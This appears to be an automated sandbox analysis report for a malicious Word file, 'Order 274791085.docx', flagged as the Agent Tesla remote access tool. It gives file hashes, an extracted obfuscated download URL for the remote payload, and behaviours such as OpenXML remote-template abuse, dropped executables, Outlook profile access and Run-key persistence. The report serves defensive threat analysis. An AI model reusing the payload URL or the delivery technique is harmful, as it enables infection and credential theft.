General
-
Target
Order 274791085.docx
-
Size
10KB
-
Sample
230419-l86a6ahh34
-
MD5
194e686634e2515c423cb0cd5f9c981a
-
SHA1
b792d00fecc27915c2a28490be4ff2e8228583e1
-
SHA256
0a8e2816b7403cd8f517b41571ad43bb532badb8638f088cadd66dfc7c1e81b9
-
SHA512
99067893db72452ff46b2fb195497427923dee9c020a6137ed178c75c0a3a98bb06e25b2a8bf509b539722dc46302a8b9590a89390225410290175e4fa5f7ed8
-
SSDEEP
192:ScIMmtPGT7G/bIwXOVOku5SEzBC4vNq6sM63qR:SPXuT+xXOVOZhlqH+
Static task
static1
Behavioral task
behavioral1
Sample
Order 274791085.docx
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Order 274791085.docx
Resource
win10v2004-20230220-en
Malware Config
Extracted
http://%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%22IIOOOWOEOEOEOEOEOEOISISODOEOEOEOODOOOOOOWWOWOQQQOWOWOWOWOIIIDIIFIFIWOEOEOEOIFIDIFODFI@1806682825/e/%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23.doc
Targets
-
-
Target
Order 274791085.docx
-
Size
10KB
-
MD5
194e686634e2515c423cb0cd5f9c981a
-
SHA1
b792d00fecc27915c2a28490be4ff2e8228583e1
-
SHA256
0a8e2816b7403cd8f517b41571ad43bb532badb8638f088cadd66dfc7c1e81b9
-
SHA512
99067893db72452ff46b2fb195497427923dee9c020a6137ed178c75c0a3a98bb06e25b2a8bf509b539722dc46302a8b9590a89390225410290175e4fa5f7ed8
-
SSDEEP
192:ScIMmtPGT7G/bIwXOVOku5SEzBC4vNq6sM63qR:SPXuT+xXOVOZhlqH+
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request
-
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location
-
Executes dropped EXE
-
Loads dropped DLL
-
Uses the VBS compiler for execution
-
Accesses Microsoft Outlook profiles
-
Adds Run key to start application
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext
-